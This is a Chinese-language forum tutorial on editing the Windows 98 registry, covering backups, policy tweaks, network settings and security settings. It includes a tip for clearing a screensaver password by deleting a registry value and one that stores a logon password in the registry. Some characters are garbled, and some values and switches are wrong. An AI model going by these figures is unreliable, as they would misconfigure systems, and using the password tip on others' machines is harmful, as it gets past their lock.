發新話題

《資訊》註冊表實用詳解

《資訊》註冊表實用詳解

[glow=570,#8B008B,6]註冊表實用詳解[/glow]
一、註冊表基礎
微軟採用註冊表來統一管理軟硬件配置,從而大大提高了系統的穩定*和安全*,同時也使我們能更容易的對系統進行維護和管理。

(一)註冊表基礎ABC

  總的來說註冊表實際上是一個龐大的數據庫,它包含了應用程序和系統軟硬件的全部配置信息,初始化信息及其它重要數據。從一般用戶的角度看,註冊表系統由兩部分組成:註冊表數據庫和註冊表編輯器。其中註冊表數據庫包括兩個文件:System.dat和User.dat。前者是用來保存計算機的系統信息,如安裝的硬件和設備驅動程序的有關信息等;後者則是用來保存每個用戶特有的信息,如桌面設置、牆紙或窗口的顏色設置等。它們一般都放在C盤Windows目錄下。同時,微軟為了防止註冊表文件的損壞,特地贅了兩個備份文件System.da0和User.da0(文件類型是.da),也是放在C盤Windows目錄下。
  在Windows 98中還有一個專門用來儲備備份文件的文件夾,即C:\Windows\Bak,相比之下,註冊表編輯器是用來對註冊表進行各種編輯的工具。你可以在「開始」菜單中點擊運行,在運行的對話框中填入「Regedit"即可看到註冊表編輯器。
  如果你在「系統配置實用程序"的啟動項裡發現ScanRegistry前的小勾沒有被去掉的話,那麼系統每天會自動調用Scanreg.exe對註冊表備份一次,備份後的註冊表被打成cab包,放在C:\Windows\sysbckup目錄下,文件名為rb00x.cab並且被加上隱藏屬*的就是(一般有五個)。
  下面讓我們具體看看系統預定義的六個主關鍵字(即根鍵)吧:
  (1)HKEY_CLASSES_ROOT:基層類別鍵,定義了系統中所有已經註冊的文件擴展名、文件類型、文件完等。
  (2)HKEY_CURRENT_USER:定義了當前用戶的所有權限,實際上就是HKEY_USERS\.Default下面的一部分內容,包含了當前用戶的登錄信息。
  (3)HKEY_LOCAL_MACHINE:定義了本地計算機(相對網絡環境而言)的軟硬件的全部信息。當系統的配置和設置發生變化時,其下面的登錄項也會隨之改變。
  (4)HKEY_USERS:定義了所有的用戶信息,其中部分分支將映射到HKEY_CURRENT_USER關鍵字中,它的大部分設置都可以通過控制面板來修改。
  (5)HKEY_CURRENT_CONFIG:定義了計算機的當前配置情況,如顯示器、打印機等可選外部設備及其設置信息等。它實際上也是指向HKEY_LOCAL_MACHINE\Config結構中的某個分支的指針。
  (6)HKEY-DYN-4DATA:定義了系統運行中的動態數據,即已發生的事件的有關信息。它不僅包含系統硬件的當前狀態,也包含了那些需要更新和檢索的數據。系統每次啟動時都要創建此關鍵字。
  另外,每個根鍵再由若干主鍵組成,鍵名代表一特定的註冊項目,鍵值可分為字符串值、二進制值和DWORD值,都能用註冊表編輯器進行修改。
  Windows的註冊表是控制系統啟動、運行的最底層設置,其文件就是System.dat和User.dat,它們不僅至關重要,而且極其脆弱.

(二)修改註冊表的基本方法

  在註冊表文本文件的首行必須用命令字符串 「REGEDIT」,其作用是通知系統調用regedit來完成註冊信息的合併工作。 接下來的每一行或代表一個鍵值的聲明或者為註釋*的說明信息。
  主鍵及其默認鍵值的聲明格式為:
  根鍵\一級主鍵\二級主鍵\......=默認鍵值
  例如,欲在根鍵HKEY_CLASSES_ROOT的「*」主鍵下添加一個「壓縮」主鍵,以便通過上下文菜單直接壓縮選定的文件,其主鍵的聲明如下:
  HKEY_CLASSES_ROOT\*\shell\壓縮 (&U)\command = C:\dos\arj.exe a Temp$%1 其中,「shell」和「command」都是固定的,不能更改和替換,「shell」指明將要為上下文菜單中添加命令, 「command」指明具體的命令行信息。另外還要注意,在等號右邊的鍵值字符串中, 如果要指明文件的路徑,其中的「\」字符要使用「\\"代替,等號的前後還要添加一個起分隔作用的空格。
  凡是用分號開頭的行,均為說明信息行,用戶可以利用說明行給文件中的命令給予必要的註解,使命令便於理解。
  使用任何一個編輯器,編輯生成一個包含一系列主鍵聲明行、說明行的列表,並將文件保存為以「.reg」為擴展名的文本文件,即創建了一個註冊表文本文件。

二、註冊表初級應用

Win 9x中註冊表的重要*,眾所周知。所以也是為了這個原因,Win 98特別新增加了個小工具——註冊表檢查器Scanreg.exe(Scanregw)。  在每次開機啟動Win 98時Scanreg自動運行,對系統註冊表進行檢查,並為每個開機日作一次備份,將System.dat、User.dat、System.ini、Win.ini四個文件打包成Cab文件,以rb00?.Cab命名,存放於系統備份文件夾Sysbckup中,默認保存最近的5個備份文檔。當檢查到註冊表出錯時,它就用備份進行恢復。平時,若註冊表有了問題或不合己意時,我們也可利用它來恢復。  
  
(一)用好「註冊表檢查程序」

  Scanreg的常用命令如下:
  Scanreg /backup /restore /comment /fix
  參數包括:
  /Backup:對註冊表以及相關的系統配置文件進行備份。
  /Restore:選擇一個備件文件進行系統恢復。
  /Fix:修復註冊表
  /Comment=「<評述>」:在做系統備份的時候,將特定的評語和標注文字加入到CAB包中。
  /Autoscan:自動掃瞄註冊表,並自動備份(如果已有當天的備份,則不帶任何提示)
  /Scanonly:掃瞄註冊表,如果有錯誤則提示,不對註冊表進行備份。
  /opt:壓縮註冊表,在每回引導檢查時如果有大於500KB的空間,則自動執行。這個命令在運行/Fix時它也將運行。
  
1、手工啟動「註冊表檢查程序」
  在某些情況下(如用戶已經人為禁止了「註冊表檢查程序」的自動運行功能之後),我們仍需要手工啟動「註冊表檢查程序」對系統進行檢查,  「開始」-「運行」-「Scanregw」-「確定」,啟動「註冊表檢查程序」,會自動對註冊表數據庫進行檢查,如果正確,它就會詢問用戶是否重新備份註冊表數據庫,如果有問題,它將建議用戶採用上次備份的信息進行恢復,確保Windows 98正常運行。
  需要說明的是,「註冊表檢查程序」的檢查、備份範圍並不局限於註冊表數據庫,它同時還會處理Win.ini和System.ini等文件以確保Windows 98的安全運行。另外,「註冊表檢查程序」在備份文件時採用了壓縮備份方式,它會將需要備份的文件統統壓縮到一個CAB壓縮包中,然後再以Rb???.cab為名保存到Windows 98的Sysbackup子目錄中(???為CAB壓縮包文件的序號),這樣既節省了磁盤空間,又提高了備份文件的安全*。

2、DOS運行註冊表檢查程序
MS_DOS下的註冊表檢查器Scanreg.exe可以用來備份及恢復註冊表。

(二)利用註冊表維護與優化軟件
  
最好的註冊表維護與優化工具當然是Norton Utilities提供的Windows Doctor和Norton Cleansweep提供的Registry Sweep。前者主攻診斷與修復,後者擅長減肥與優化。對於Windows Doctor,它的優點在於不但提供了對系統註冊表錯誤設置的強大自檢功能,而且還能全自動地修復。而Registry Sweep能非常徹底地為你的註冊表減肥,將註冊表中那些無用的系統垃圾完全清除。它們都相當智能,即使你對註冊表的維護一無所知,只要一路「Next"下去,就能輕鬆完成對註冊表的修復和優化,完完全全的「傻瓜"。

Nuts & Bolts中的Registry Wizard也是非常稱心的註冊表維護的好工具,同樣具有修復與減肥功能,清理註冊表來又快又好。

當然,如果你不想選擇集成式的系統維護工具,可以使用專門的註冊表維護與優化軟件。優化大師和超級兔仔註冊表優化軟件就很不錯,不僅能夠修復錯誤,而且能夠清除非常多的註冊表垃圾。

經典的註冊表優化工具RegClean也是上選,憑著微軟在操作系統領域中的霸主地位,它的註冊表清理工具就值得你信賴。

還有其他的不在介紹了

(三)手動註冊表修改步步高

  我們有時真希望電腦的界面和設置能發生一些變化,這樣也能滿足我們張揚的個*。修改註冊表就不失為一個很好的方法,工具軟件的原理絕大多數都是通過對註冊表的操作而實現對系統的更改,只不過這些工作並不需要你去做,也沒讓你看到罷了。如果你真要成為電腦高手,怎能不學會對註冊表的修改?

  1、啟動Windows時增加警告標題或問候信息
  在 Hkey-Local-Machine\Software\Microsoft\Windows\CurrentVersion\Winlogon 下新建兩個字符串值,一個是信息框的標題:「LegalNoticeCaption」,它的值不妨設為「請你注意!";另一個自然是信息框的內容了:「LegalNoticeText」=「上機沒關係,可不要太久哦,你還有很多事沒做呢!"。這樣在你啟動系統時,就會有一個信息框提醒你注意上機的時間和效率,不至於玩物喪志。當然,你完全可以輸入其他的座右銘或問候語,來個極具個*化的「開場白"。

  2、刪除開始菜單中不需要的子項
  有時當你出於某種原因不再需要開始菜單中的某個子項時,你可以修改註冊表將其刪除。在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下 添加相應的DWORD值,其中可以刪除的子項有:收藏夾、文檔、控制面板、查找、運行、註銷、關閉系統及單擊從這裡開始的活動完,相應的鍵為:「NoFavoritesMenu、「NoRecentDocsMenu、「NoSetFolders、「NoFind、「NoRun、「NoLogoff、「NoClose」及NoStartBanner」,所有的鍵值均是「1」為關閉,「0」為激活(即原Windows默認狀況)。HKEY_CURRENT_USER的設置是對應於所有用戶的,若要針對當前登錄用戶,則在HKEY_USERS子樹相應的目錄下更改即可。

  3、隱藏驅動器和禁用任務欄
  在必要的時候你甚至可以隱藏某個驅動器以防止別人偷看你的個人隱私或機密文檔。在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下新建二進制串值 「NoDrives。此鍵值與相應要隱藏的驅動器的關係有:「01 00 00 00」為隱藏A驅,「02 00 00 00」為B驅,「04 00 00 00」為C驅,「05 00 00 00」為D驅,隱藏全部的為「FF FF FF FF。相同路徑下DWORD值為「1」的「NoSetTaskbar"能讓他人無法使用你的任務欄。

  4、鎖定桌面和禁止使用註冊表編輯器
  當你不希望別人修改你機器上的個人設置時,可直接把桌面鎖起來,甚至對別人禁用註冊表編輯器Regedit(但千萬不要忘了為自己留條後路,儲備第二個修改器吧)。在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下加入DWORD值為「1」的「NoSaveSettings」和"NoChangeStartMenu"。此後系統對用戶所作修改將不進行保存,也就是說用戶對系統所作的一些修改都僅對當次運行有效,重啟後就會自動恢復成修改前的狀態。在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies下新建一主鍵「System",就可用一個DWORD值為「1」的「DisableRegistryTools"禁止regedit的使用。

  5、取消CD的自動播放功能,或禁止AUTORUN(自動運行)功能但保留CD的自動播放功能
  將HKEY_LOCAL_MACHINE\Enum\SCSI\LITEON__CD-ROM_LTN403L__F(這是光驅信息,你的可能跟我不一樣)\MF&CHILD0000&PCI&VEN_1106&DEV_0571&SUBSYS_00000000&REV_06&BUS_00&DEV_07&FUNC_01主鍵下的二進制值「AutoInserNotification"的值設為 00.或將HKEY_CLASSES_ROOT\AudioCD\shell下主鍵「play"的內容刪掉即可。
  禁止Autorun(自動運行)功能,但保留CD的自動播放可在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下將串「NoDriveTypeAutoRun」的值改為 「bd 00 00 00。

  6、手動控制系統啟動時自動加載的運行程序
  在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下Run的若干主鍵,它們就是系統啟動時被加載的自動運行程序。相對應的Run-可以根據不同的情況靈活處理,自己控制自動運行的程序。
  需要提醒你的是,RunServies中的程序是在操作系統啟動時就開始加載的,而Run下的程序是Windows初始化後才運行的,所以Runservies中的程序要先於Run中的程序運行,刪除它們時一定要多加小心!

  7、刪除不完全刪除的軟件訊息
  有時我們在直接刪除某些文件夾或手動卸載軟件時並沒有完全將要刪除的軟件信息清除出系統,這時除了用反安裝軟件幫你打掃垃圾外,你也可以就用註冊表編輯器在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall 下刪去相應軟件的主鍵。從此再也不怕垃圾污染了!

  8、設置關聯文件的多路打開
  現以BMP文件為例,簡述其設置方法,你完全可以舉一反三,靈活運用。在HKEY_CLASSES_ROOT\* 下單擊 * 新建主鍵並命名為「Shell」,用右鍵單擊「Shell」再新建一主鍵並輸入自己喜歡的名字,這裡以「打開方式"為例。接下來右鍵單擊「打開方式」新建一主鍵命名為「Command」,編輯「默認」輸入「Rundll32.exe Shell32.dll,OpenAs_RunDLL %1。以後有BMP文件時,用右鍵點擊完,則會在彈出的菜單中多出一項我們剛建成的「打開方式」,點擊它你就會發現用處了

TOP

三、註冊表高級應用

工具軟件可對註冊表進行一系列的優化等操作。但碰到特殊的個案,就不靈了,還是需要我們手動進行。在對註冊表操作之前,切記切記做好備份,否則極容易「一失足成千古恨。

(一)修改註冊表表現個性

  改變一般完大小(像素):更改[HKEY-CURRENT-USER\Control Panel\desktop\WindowMetrics] ,令Shell Icon Size=〞32〞即可。

  改變小完大小(像素):在[HKEY-CURRENT-USER\Control Panel\desktop\WindowMetrics]中,更改或新建Shell Small Icon Size=〞16〞即可。

  禁止系統右鍵彈出菜單:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,建立鍵值NoViewContextMenu= 01 00 00 00。

  禁止任務欄右鍵彈出菜單 :在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoTrayContextMenu=01 00 00 00。

  隱藏[設置]菜單中[控制面板]和[打印機]菜單項:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建鍵值NoSetFolders=01 00 00 00。

  隱藏[設置]菜單中[任務欄和開始菜單]菜單項:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建鍵值NoChangeStartMenu=01 00 00 00,NoSetTaskbar=01 00 00 00。
  
  隱藏[設置]菜單中[文件夾選項...]:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoFolderOptions=01 00 00 00。

  隱藏[設置]菜單中[活動桌面]項:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoSetActiveDesktop=01 00 00 00。

  隱藏[設置]菜單中[Windows Update]項:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoWindowsUpdate=01 00 00 00。

  禁止「文檔」記錄功能:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoRecentDocsHistory=01 00 00 00。

  退出時自動清除文檔內容:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建ClearRecentDocsonExit= 01 00 00 00。

  禁止數據光盤自動運行:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,新建NoDriveTypeAutoRun=00 00 00 00。

  禁止CD光盤自動運行:在[HKEY-CLASSES-ROOT\AudioCD\shell]中,新建鍵值@=〞 〞

  去除新建快捷方式時自動添加的「快捷方式」字符串:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Explorer]中,令Link=00 00 00 00。或者
  HKEY-LOCAL-MACHINE\Software\Classes\lnkfile
  HKEY-LOCAL-MACHINE\Software\Classes\piffile
  以上兩處的鍵值中都有一個 「IsShortCut」的字符串值,刪除它,

   禁止使用MS-DOS方式:在[HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]中,建立鍵值Disabled=01 00 00 00。

  關閉「無反應的應用程序」的等待時間(毫秒):在[HKEY-CURRENT-USER\Control Panel\desktop]中,新建WaitToKillAppTimeOut=〞10000〞

  關閉出錯應用程序的等待響應時間(毫秒):在[HKEY-CURRENT-USER\Control Panel\desktop]中,新建HungAppTimeout=〞10000〞。

  給Windows 98啟動框換個名 打開HKEY_LOCAL-MACHINE/SOFTWARE/Microsoft/Windows/Current Version,選中Version字串,雙擊將Windows 98換成你希望的名字,通過「電腦」直接啟動資源管理器     打開HKEY_CLASS_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell,右擊shell,建立新主鍵「Open」,再在Open下建「Command」主鍵,鍵值改為「explorer /e c:\」(其缺省打開路徑為「c:\」,要想改變,將「c:\」換為指定的路徑名即可)。生效後雙擊「電腦」打開的就不再是「電腦」窗口,而是資源管理器了。

  改變 Windows 98的安裝路徑   打開HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup在右邊的窗口中找到「SourcePath」,然後將它改為你想要的即可。

  清除積累在運行」和「查找」對話框中的文件名
  打開HKEY_USERS/Default/Software/Microsoft/Windows/Current Version/Explorer/Runmru,在右窗口的「運行……」對話框刪除;
打開 HKEY_USERS/Default/Software/Microsoft/Windows/CurrnetVersion/Explorer/DOC Find Spec MRU,在右窗口的「查找……」對話框刪除。

讓「回收站」換名或從桌面上刪除它   打開HKEY-CLASSES-ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}將「默認」字符串的鍵值由「回收站」變為其它。
  打開
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Desktop/Namespace/{645FF040-5081-101B-9F08-00AA002F954E},右擊右邊窗口的「默認」字符串,並選「刪除」,可刪除「回收站」,如要恢復,進行其逆過程,在NameSpace主鍵下新建名為{645FF040-5081-101B-9F08-00AA002F954E}的主鍵即可。

  隱藏桌面的所有完   HKEY-CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer,右窗口空白處新建/Dword為Nodesktop,將其鍵值改為1。恢復時只需將值改為0,或直接刪除Nodesktop即可。如果更名為Nosavesettings,雙擊將其鍵值改為1,則會使桌面保持在第一次設置時的狀態,即鎖住桌面。如果更名為Noclose,雙擊將其鍵值改為1,則生效後開始菜單無「關閉系統」選項。恢復法同上。

  加速階層式菜單的速度
  打開HKEY-CURRENT-USER/ontrol Panel/desktop,單擊編輯,選「新增」,選「串值」,命名為MenuShowDelay,雙擊它,在調整欄設數值1-10,1為最快

  啟動Windows時自動登錄用戶名及口令
  打開 HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\Current Version\Winlogon,建一字符串「Default Password」,改其值為缺省用戶口,而缺省的用戶名位置為:HKEY-LOCAL-MACHINE\etwork\Logon。

  改變「電腦、「回收站」的完
   「HKEY-LOCAL-MACHINE\SOFTWARE\Classes\CLSID」選項,然後選擇「編輯」\「查找」,鍵入「回收站」並確認。當找到該項後, 選擇該項的DefaultIcon選項, 雙擊名稱欄中的 「Full」(或「Deafult、「Empty」),在彈出的對話框中顯示的是「回收站」所對應的完文件,更改該值為您喜歡的完文件(注意要寫全文件路徑)。用同樣的方法可以修改「電腦」的完,只要在查找時鍵入「電腦」並確認即可。
  
  為文件夾菜單添加「快速清空回收站」   進入 「HKEY—CLASSES—ROOT\*\shellex\ContextMenuHandlers」,在左欄中右擊ContextMenuHandlers文件夾,然後「新建」 \「主鍵」,將新文件夾的名稱一字不差地改為:「{645FF040-5081-101B-9 F08-00AA002F954E}」,然後回車確認即可。

  刪除運行窗口中多餘的選項 在HKEY—USER\.Default\Software\Microsoft\Windows\CurrentVersion\Exploer\RunMRU的右窗口中保存著這些操作,刪掉不需要的串值即可。

把控制面板中的各個組件直接加到「運行」菜單中   用資源管理器在c: \Windows\Start Menu下建立一個名為 「控制面板.{21EC2020-3AEA-1069-A2DD-08002B30309d}」的文件夾(注意:空格、句點、大括號都要輸入, 不能有錯, 這裡大括號中的數字是註冊表中控制面板對應的類標識符,可在註冊表編輯器的HKEY_CLASSES_ROOT\CLSID下面查出, 各機器的值可能會有所不同,應以查到的結果為準。

刪除桌面上的「系統級」完   不能用一般的方法刪除回收站、收件箱、網上鄰居的完時,先把HKEY—LOCAL—MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace下分支的關鍵字和右窗口的串值 (用紙筆)記下(供恢復時用),然後刪掉所不需要的分支。

  修改軟件的所有權名稱   將HKEY—LOCAL—MACHINE\SOFTWARE\Microsoft\Deveoper\Setup右窗口所有權鍵值修改一下改變窗口變化時的動畫效果 HKEY—CURRENT—USER\Control Panel\Desktop\WindowsMetrics。在右邊「新建」(New)\「串值」(String value),輸入Minanimate後回車,為Minanimate的鍵值改為0。

為一台機器設置兩個IP地址 HKEY—LOCAL—MACHINE\System\CurrentControlSet\Services\Class\NetTrans,0000、0001 、0002……的目錄,它們用於記錄協議的安裝情況。找到DriverDesc為「TCP/IP」的目錄,修改IPAddress和IPMask兩個鍵。 其中IPAddress為用逗號隔開的多個IP地址, IPMask是對應的掩碼。例如設置IPAddress為「202.10.1.10,202.10.1.25」,IPMask為「255.255.255.0,255.255.255.0」時,表示為系統設置了兩個IP地址202.10.1.10和202.10.1.25。

時間也能個性化
打開HKEY_CURRENT_USER\ControlPanel\International主鍵,在右邊窗口的空白處新建名為「sTimeFormat」的字符串。將其鍵值修改為「hh點mm分。

讓心愛的壁紙永駐桌面
HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies子鍵,新建一個名為「ActiveDesktop」的子鍵,在其下新建一個雙字節值(也就是WORD值),命名為「NoChangingWallPaper」,將數值設為「1。

防止他人更改用戶的桌面設置
打開HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer中的「NoSaveSettings」(如沒有此鍵,用戶可自行添加),並將其鍵值從0改為1,就可以把桌面設置全部鎖定了。

查看縮略圖
Win 2K的用戶可以在資源管理器中直接查看圖片文件的縮略圖,而Win 98的用戶就不可能直接查看了,不過通過下面的修改就可以了。
打開HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon,雙擊右窗格中的「默認」,將鍵值參數末尾的「1」改為「%1」,重啟就可以了。

找回失去的提示信息
在Windows中當你把鼠標停留在「電腦」等完上時,會出現一行提示信息,如果提示沒有了,該怎麼辦?
打開HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Explorer\Advanced子鍵,在右側的窗口中,雙擊「showInfoTip」,在彈出的對話框中將其值設為1,提示又回來了吧。

終止被鎖死的程序
當我們在關機、重啟計算機時,有時會彈出錯誤對話框,提醒用戶「某個程序還在運行,請先關閉所有程序,然後退出Windows」,這說明由於某個程序處於鎖死狀態致使用戶無法退出系統,通常的方法是用三個熱鍵,然後點擊結束任務來強行關閉鎖死的程序,我們可以通過修改註冊表終止鎖死的程序,讓系統安全關閉打開HKEY_CURRENT_USER\Controlpanel\desktop,雙擊右窗口中的「AutoEndTasks」項,將其值改為1,如果沒有該項,可以新建再改之即可。

刪除多餘的.dll文件
打開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\SharedDlls子鍵,在右邊的窗口中,每個值項的數據都說明了該值項的.dll文件有幾個程序共享,如果數據為0,則可知道該文件沒有程序共享,可以刪掉了。

刪除多餘的配色方案
打開HKEY_CURRENT_USER\Control Panel\Appearance\Schemes子鍵,在右側的窗口中顯示了系統自帶的各種配色方案,選擇某個方案,然後把它刪除。刪除時注意保留「默認」項。

(二)註冊表實戰之網絡與安全設置

1.網絡設置

設置登錄時恢復連接
在Windows中可以把遠程的共享目錄映射成本地的一個驅動器,給局域網用戶的日常操作帶來方便。如果要經常使用網絡資源,可以設置計算機下次登錄時自動恢復連接。
打開HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Control\NetworkProvider子鍵,新建一個雙字節值,命名為Restore Connection。將數值設為1即可。

加快上網速度
打開HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP子鍵,右側窗口中的DefaultTTL,將數值設為128。然後再打開HKEY_LOCAL_MACHINE\System\ CurrentControlSet\Services\Class\NetTrans子鍵,將MaxMTU和MaxMSS項的數值分別設為576和536。

設置自動撥號功能
打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Internet Settings子鍵,雙擊右側窗口中的NoNetAutodial,將數值設為01 00 00 00。

2.安全設置

設置Win 98開機密碼
Win 98在啟動時和註銷後,會要求用戶輸入用戶名和密碼,但是點「取消」就可以進入,並不能阻止非授權用戶的使用。只要調整幾個設置,就可以防止非法用戶的使用。
(1)需要將登錄方式改為「Microsoft友好登錄。打開控制面板,雙擊網絡完,在「基本網絡登錄方式」下的下拉列表中選中「Microsoft友好登錄」,然後點「確定」,這樣就把它設置成基本的登錄方式。如果沒有找到,說明沒有安裝,那麼需要添加它。
(2)接下來建立用戶。在控制面板中,雙擊「用戶」完。點「新建」按鈕,給每個可以使用此機器的用戶建立一個用戶名,可以立刻就輸入密碼,也可以留到用戶登錄後自己修改密碼。
(3)打開HKEY_LOCAL_MACHINE\Network\ Logon,在右邊新建一個DWORD值,改名為「MustBeValidated」,雙擊它,將值改為1,就行了,重啟看看用「取消」能不能進入系統。

設置密碼的安全要求
Windows系統在缺省配置下允許任何字符或字符串作為密碼,包括空格,這是相當不安全的,下面我們通過修改註冊表使得用戶設定的密碼中必須同時包含字母和數字,從而增強系統的安全*。

打開HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\Policies,新建Network子鍵,在右側窗口中新建一個名為AlphanumPwds的雙字節值,數值為1即可。

清除特洛伊木馬程序BO
BO的文件是一個完為全透明的文件,它將自己複製入硬盤後把自己重命名為「空格.EXE。
打開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run子鍵,如果該鍵下的默認為.exe,說明你已經中了BO木馬,刪除該鍵。然後重啟計算機,刪除windows\system下的空格.exe和windll.dll即可。清除其它的木馬程序與此類似,不再詳述。

開機自動運行屏保
打開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run子鍵,新建一個名為「密碼確認」的字符串項,在數值一欄中輸入屏保程序的路徑和名稱即可。

解除屏保密碼
打開HKEY_USERS\.Default\Control Panel\ desktop,找到右側窗口中的ScreenSave_Data,將該鍵刪除。這樣屏保的密碼就輕鬆地解除了。

(三)註冊表的靈活備份和快速恢復

  由於Windows在運行時註冊表是處於打開的狀態,所以我們不能對它進行寫入的操作,即不能對註冊表進行恢復和修復操作。在實際使用中,可以對註冊表的維護採用了一種更為靈活與快速的方法。  

靈活備份
  1.取消了註冊表檢查器的自啟動特權,而讓它隨叫隨到,完全聽命於我,該出手時才出手。這樣做也另有好處,即加快了Win 98的啟動速度。
  2.安裝調試完Win 98和常用應用程序並優化註冊表後,運行Scanregw程序,作一個備份文檔rb000.cab。這一備份作為最基本的文檔資料,一般不動。
  3.以後系統每有更動,運行正常確認無誤後,即再作一個備份。此次為活動備份,但僅保留1個,即後面的始終替換前面的,為rb001或rb002。
  這樣,就始終保留2個備份,既節省了一定的磁盤空間,又能合我們的意願,還縮短了Win 98的啟動時間。且恢復時,就在rb000和rb001(或rb002)之間酌情選擇,簡單明瞭,省時省力。

快速恢復
  當註冊表遭到損壞或不合我們的意願而必須作恢復時,在純DOS方式下,鍵入scanreg/restore,然後依照提示去做。這法子確實省事,可以這樣做:
  進入純DOS方式(「關閉系統→「重新啟動計算機並切換至MS-DOS方式」),在C:\WINDOWS下鍵入:
  attrib -s -h -r *.dat
  extract/e/y sysbckup\rb00x.cab *.dat
  若system.ini與win.ini也要恢復,則將*.dat改成*.*,即:
  attrib -s -h -r *.*
  extract/e/y sysbckup\rb00x.cab *.*
  (其中rb00x中x為未知數,操作時應具體為備份文件名)
  完後鍵入exit或按Ctrl+Alt+Del重新啟動Win 98。

(四)註冊表恢復手法大公開

  1、Scanreg
  如果你的系統是Windows 98,那麼你可以用它提供的Scanreg.exe進行系統的備份與恢復,其最大優點是簡單快速。其默認目錄是C:\Windows\command.

  2、dos下導出導入法
  運行「Regedit"打開註冊表編輯器,點擊「註冊表"的菜單,選中「導出註冊表文件",在打開的對話框中輸入文件名,保存後即可。當你需要恢復你的註冊表時,從備份的路徑中「導入註冊表文件"就搞定了。

  導出註冊表文件 命令格式:
Regedit /L:system /R:user /E filename.reg Regpath
參數詳解:
/L:system指定system.dat文件所在的路徑。
/R:user指定user.dat文件所在的路徑。
/E:此參數指定註冊表編輯器要進行導出註冊表操作,在此參數後面空一格,輸入導出註冊表的文件名。
Regpath指定要導出哪個註冊表的分支,如果不指定,則將導出全部註冊表分支。
注意事項:
/L:system和/R:user參數為可選項,如果缺省,那麼註冊表編輯器認為是對Windows目錄下的system.dat和User.dat進行操作。但是如果你從軟盤開始啟動,那麼必須使用/L和/R參數來指定System.dat和User.dat文件的具體路徑,否則註冊表編輯器將無法找到它們。

  導入註冊表文件 命令格式:
Regedit /L:system /R:user file.reg
參數詳解:
/L:system指定system.dat文件所在的路徑。
/R:user指定user.dat文件所在的路徑。
注意事項:
導入註冊表和導出註冊表在參數上有所不同,它僅僅需要指定被導入的.reg文件的路徑即可,而不需要像「/E、「/C」這樣的參數。
  
  3、 dos下重建註冊表 命令格式:
Regedit /L:system /R:user /C file.reg
參數詳解:
/L:system指定system.dat文件所在的路徑。
/R:user指定user.dat文件所在的路徑。
/C:此參數將告訴註冊表編輯器,用所指定的.reg文件中的內容重新建立註冊表。
注意事項:
參數/C是個危險選項,它將會導入指定註冊表文件的全部內容,從頭到尾開始創建一個新的註冊表。

  4.dos下刪除註冊表分支
此命令可以將註冊表中的一個子鍵分支刪除。
命令格式:
Regedit /L:system /R:user /D REGPATH
參數詳解:
/L:system指定system.dat文件所在的路徑。
/R:user指定user.dat文件所在的路徑。
/C:此參數告訴註冊表編輯器,將REGPATH所指定的註冊表子鍵分支刪除。
注意事項:
參數/C將刪除指定子鍵下所包含的所有內容,包括所有子鍵、鍵值項和鍵值。

5、DOS下修復註冊表文件(見初級應用) 命令格式:

6、覆蓋還原法   具體來說,又可分為兩種。
  第一種,利用兩個DAT文件恢復。若你已經不能進入Win 98系統時,可以用DOS或Win 98啟動盤引導,或者乾脆從「DOS Prompt"啟動,進入C:\Windows目錄下,修改System.dat和User.dat這兩個文件的屬*後將其刪除,再把兩個備份文件.da0覆蓋到相應的.dat文件上即可(留一個User.dat沒覆蓋)。若你對DOS下的Xcopy命令熟悉,用它也行。當然,如果你還能進入系統,那麼直接在Windows下操作不是更容易?修改屬*,刪除源文件,為備份文件改名。
